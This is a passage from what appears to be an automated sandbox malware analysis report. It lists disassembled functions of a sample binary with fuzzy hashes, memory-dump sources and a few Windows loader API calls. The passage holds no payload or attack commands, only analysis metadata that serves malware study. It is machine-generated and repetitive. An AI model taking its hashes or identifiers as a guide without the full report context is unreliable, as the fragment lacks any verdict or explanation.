                                                                                                                                • Instruction Fuzzy Hash: 2D71C662D0898645FF646B05D0482BAB7A0DB5ABA0FC8803AD74D077D1DBECE5DDC368
                                                                                                                                Function 00007FF71276C955 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for floating-point$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 0-672633561
                                                                                                                                • Opcode ID: bd92c789633ce0a064ee06438a11b82876e6326ff896c99f87e0af1d76ea06df
                                                                                                                                • Instruction ID: f2854f5a8465c81e09ba5dd86268f8a49f78999bda3f0982a4eb1ad0b0f9ad54
                                                                                                                                • Opcode Fuzzy Hash: bd92c789633ce0a064ee06438a11b82876e6326ff896c99f87e0af1d76ea06df
                                                                                                                                • Instruction Fuzzy Hash: F4112B61E18D4294FB75B714E459377F6909FABB20FE40036D30C015E28DADB94CC729
                                                                                                                                Function 00007FF71276EE30 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 423COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 3363080787-1689078516
                                                                                                                                • Opcode ID: 245ea8c1471c47be9868ac7f7557a5bcca5bbc018673d067c3cf4683f4f7d1fe
                                                                                                                                • Instruction ID: 76642bd6170e4aa58c9896baba67bbeb3ec1e3d6700d2bf747a43ad0f6d136cd
                                                                                                                                • Opcode Fuzzy Hash: 245ea8c1471c47be9868ac7f7557a5bcca5bbc018673d067c3cf4683f4f7d1fe
                                                                                                                                • Instruction Fuzzy Hash: DE02B122A18E8186FB10EB65E4402BEB7A0FB5A7A4FD44131DB9E03A94DFBCD44DC715
                                                                                                                                Function 00007FF71276E5C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                • API String ID: 909987262-435359029
                                                                                                                                • Opcode ID: e39558d1cbbba9f3a95edfad885d7de953e178870c75a2728dc50ebc8126b2a8
                                                                                                                                • Instruction ID: c7a292d6c7094d468e604d8ef8c2c4fee1edf79d42aac86218a7462abbd8a74c
                                                                                                                                • Opcode Fuzzy Hash: e39558d1cbbba9f3a95edfad885d7de953e178870c75a2728dc50ebc8126b2a8
                                                                                                                                • Instruction Fuzzy Hash: F2411732A08D4782F614AB18D0506BBA3A0FF5AB60FD44532E75D431D2EF6CE59DC724
                                                                                                                                Function 00007FF71276C96D Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 909987262-3881850929
                                                                                                                                • Opcode ID: e336c6db2436f037d43d8d38142368cd910891573940fba26cba82e07368c84d
                                                                                                                                • Instruction ID: c978907c2c9e25d236d844d9dcea92de0c48118511ac0fb0c42055571c8e15a4
                                                                                                                                • Opcode Fuzzy Hash: e336c6db2436f037d43d8d38142368cd910891573940fba26cba82e07368c84d
                                                                                                                                • Instruction Fuzzy Hash: F0012E61E18D4254FB76B714D459377F6905FAB720FE4003AD30D015A28DADA94CCB29
                                                                                                                                Function 00007FF71276CCC0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 139COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
                                                                                                                                • API String ID: 909987262-2617750137
                                                                                                                                • Opcode ID: a91aab9cb0516542fa6c0791161addf02aa51be5814a394f641eb71d45558398
                                                                                                                                • Instruction ID: 8c62748ec44db7bed60cb9186a8c4224147a79d1a7d253174a4e01abcea009c0
                                                                                                                                • Opcode Fuzzy Hash: a91aab9cb0516542fa6c0791161addf02aa51be5814a394f641eb71d45558398
                                                                                                                                • Instruction Fuzzy Hash: FE51F332E0898282FB24AB18D0541BAB370FF5ABA4FD4413AD75D421D5DFACE98DC364
                                                                                                                                Function 00007FF71276C97D Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for pointer$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 0-11378995
                                                                                                                                • Opcode ID: 310ac8017e6359a229e352d4b432ebe827916d3af7a1eeb48135549f8abafe2b
                                                                                                                                • Instruction ID: 6f54f7fe0657abaa8f27ebc8399584b447a706e288cd8c1fccdb71be1eefefc6
                                                                                                                                • Opcode Fuzzy Hash: 310ac8017e6359a229e352d4b432ebe827916d3af7a1eeb48135549f8abafe2b
                                                                                                                                • Instruction Fuzzy Hash: E7013C61E18D4254FB757214D459377B6909F6B720FE4003AD30C015E28CAEA98CCB69
                                                                                                                                Function 00007FF712776410 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                • Opcode ID: d0cb5301bfb14595140cc0811a37ec76ac063a7b0abac73273aaf138af097b2d
                                                                                                                                • Instruction ID: ff6b0d650ae853c7b7cf7a6f97f85b0589031d11b837b2d86041699c97e898a7
                                                                                                                                • Opcode Fuzzy Hash: d0cb5301bfb14595140cc0811a37ec76ac063a7b0abac73273aaf138af097b2d
                                                                                                                                • Instruction Fuzzy Hash: 30D19332A08B818AEB10BB65D4493AEB7A0FB4A7A8F900135DF4D57759DF78E45CCB10
                                                                                                                                Function 00007FF7127714D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 177COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name$false$true
                                                                                                                                • API String ID: 3230409043-1062449267
                                                                                                                                • Opcode ID: 69a7a7328782b9d9da7e613120da02cfc4e3f83b39ea872eae86a1c051234332
                                                                                                                                • Instruction ID: f5649472539b6682959f3f53ed53aad27d4130bf0aa8721b9d106fbeb0809320
                                                                                                                                • Opcode Fuzzy Hash: 69a7a7328782b9d9da7e613120da02cfc4e3f83b39ea872eae86a1c051234332
                                                                                                                                • Instruction Fuzzy Hash: 35818D22A18B4185FB00EF60E4442AEB7B0FF9A754F941135EB8D27A59DFB8D098C760
                                                                                                                                Function 00007FF71277F060 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 490COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID: f$p$p
                                                                                                                                • API String ID: 3215553584-1995029353
                                                                                                                                • Opcode ID: 33ca78d60bc5f6766661f281c9a33675417ec6c8c3f173fb2b57ff99d840dbb5
                                                                                                                                • Instruction ID: 8fd472ec14169e32dd71dbdfc836cda3dedbf814df809d1d761cc8b874653405
                                                                                                                                • Opcode Fuzzy Hash: 33ca78d60bc5f6766661f281c9a33675417ec6c8c3f173fb2b57ff99d840dbb5
                                                                                                                                • Instruction Fuzzy Hash: 0112A325E0C94387FB20BA14E25C27BA291FB4A774FD44035D79946AD4DBBCE48CCB62
                                                                                                                                Function 00007FF712783100 Relevance: 10.8, APIs: 7, Instructions: 293COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 722540caa61f020c4d2b8043f1e5e0a23e657944d52b35ebb30d377056aba856
                                                                                                                                • Instruction ID: 59202b7bf4328e56c005fda99120392462b4c19ab7ccc316004012b387eaf905
                                                                                                                                • Opcode Fuzzy Hash: 722540caa61f020c4d2b8043f1e5e0a23e657944d52b35ebb30d377056aba856
                                                                                                                                • Instruction Fuzzy Hash: EAC1D562A0CE8641E7617B1994462BFB790EB8ABA0FD50131DB4D077A1DEFCE45DC320
                                                                                                                                Function 00007FF71276CB30 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                                                                                                                                • API String ID: 909987262-2189586557
                                                                                                                                • Opcode ID: 99897ebe6694852e25c7ea0d4d07e836e670ceaf1c9a5c33b75c505e65619796
                                                                                                                                • Instruction ID: 5e42782f2d69dc806692bfc9071e2cee77d417b972acef974acbdc2da3a59d4a
                                                                                                                                • Opcode Fuzzy Hash: 99897ebe6694852e25c7ea0d4d07e836e670ceaf1c9a5c33b75c505e65619796
                                                                                                                                • Instruction Fuzzy Hash: B541B621F08D8282FA24BB59D4080BBF351DB5ABD4BD84036DB4C177A5DDACE54DC324
                                                                                                                                Function 00007FF712778D3C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF712778F43,?,?,00000000,00007FF712775A4A,?,?,?,00007FF712775681), ref: 00007FF712778DC1
                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF712778F43,?,?,00000000,00007FF712775A4A,?,?,?,00007FF712775681), ref: 00007FF712778DCF
                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF712778F43,?,?,00000000,00007FF712775A4A,?,?,?,00007FF712775681), ref: 00007FF712778DF9
                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF712778F43,?,?,00000000,00007FF712775A4A,?,?,?,00007FF712775681), ref: 00007FF712778E67
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF712778F43,?,?,00000000,00007FF712775A4A,?,?,?,00007FF712775681), ref: 00007FF712778E73
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                • String ID: api-ms-
                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                • Opcode ID: 9dbde63215cfc7ba96cacac694e9eb4286c7b5e2e0c56a200d663d579f1fb202
                                                                                                                                • Instruction ID: 1822f98518e7d9e531bd0cbd391883cc8e5034f85614a423ada8261451bf21d0
                                                                                                                                • Opcode Fuzzy Hash: 9dbde63215cfc7ba96cacac694e9eb4286c7b5e2e0c56a200d663d579f1fb202
                                                                                                                                • Instruction Fuzzy Hash: F5318321B1AE4282EE55BB12D808576A394BF4EB74F890935DF1D46790EFBCE44CD360
                                                                                                                                Function 00007FF71278B8F8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                • String ID: CONOUT$
                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                • Opcode ID: 70b9b4b18cdd0463ba611dc2b562efa17e2d6f8e409e651d34a518ccd629b44f
                                                                                                                                • Instruction ID: ec5f7b424e0febc04e228153b631b6d312d4bc92109dda3041dee3a4bc924f62
                                                                                                                                • Opcode Fuzzy Hash: 70b9b4b18cdd0463ba611dc2b562efa17e2d6f8e409e651d34a518ccd629b44f
                                                                                                                                • Instruction Fuzzy Hash: 2D11E121A18E4182F750AB06E84132AE3A0FB8DBF4F800230EA1D837A4DFBCD84CC350
                                                                                                                                Function 00007FF71276C8B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type specifier$Zero modifier requires an arithmetic or pointer presentation type
                                                                                                                                • API String ID: 0-1829489339
                                                                                                                                • Opcode ID: 9d1d7f6b48b2148a2be8a280d6ad38378451906d75941cc495af1718f4f759e6
                                                                                                                                • Instruction ID: ce46547ceca7f79d771652144e03d9e9cfb4cdc4a7fc4eeb20ecbfc4d7aa7eea
                                                                                                                                • Opcode Fuzzy Hash: 9d1d7f6b48b2148a2be8a280d6ad38378451906d75941cc495af1718f4f759e6
                                                                                                                                • Instruction Fuzzy Hash: C4018062E1CD5299FB66B314D45D377B6509F6B720FE4003AD30C415E2CCADA98CCB29
                                                                                                                                Function 00007FF7127733CC Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiStringWide
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2829165498-0
                                                                                                                                • Opcode ID: 4656a780b65f2dba5bdd5ccf7afebc1fe425982cac1aa4f8c33221aefcbdc509
                                                                                                                                • Instruction ID: bccc9ebcf8df24e1c4e7c850c251bbbed58c437fab41ecb6a7ac3651b6f028c9
                                                                                                                                • Opcode Fuzzy Hash: 4656a780b65f2dba5bdd5ccf7afebc1fe425982cac1aa4f8c33221aefcbdc509
                                                                                                                                • Instruction Fuzzy Hash: E281A172608B4186EB24AF25944527AA2A1FB4ABF8F940631EB5D47BD4DFBCD40CC720
                                                                                                                                Function 00007FF712766620 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                • Opcode ID: 0dd1054ecf2c838b0c6fa03abb329649a9275ee65366250e4a6a3aaa965ae2b3
                                                                                                                                • Instruction ID: 4b24686757723b7c9e3b296c4b346b03d08295987d62a530b972054ff3a12328
                                                                                                                                • Opcode Fuzzy Hash: 0dd1054ecf2c838b0c6fa03abb329649a9275ee65366250e4a6a3aaa965ae2b3
                                                                                                                                • Instruction Fuzzy Hash: BD416F31A08F4285FB50EF15E44416AB360FB99BA0F881132DB5D037A5DE7CE45DC714
                                                                                                                                Function 00007FF7127768E0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
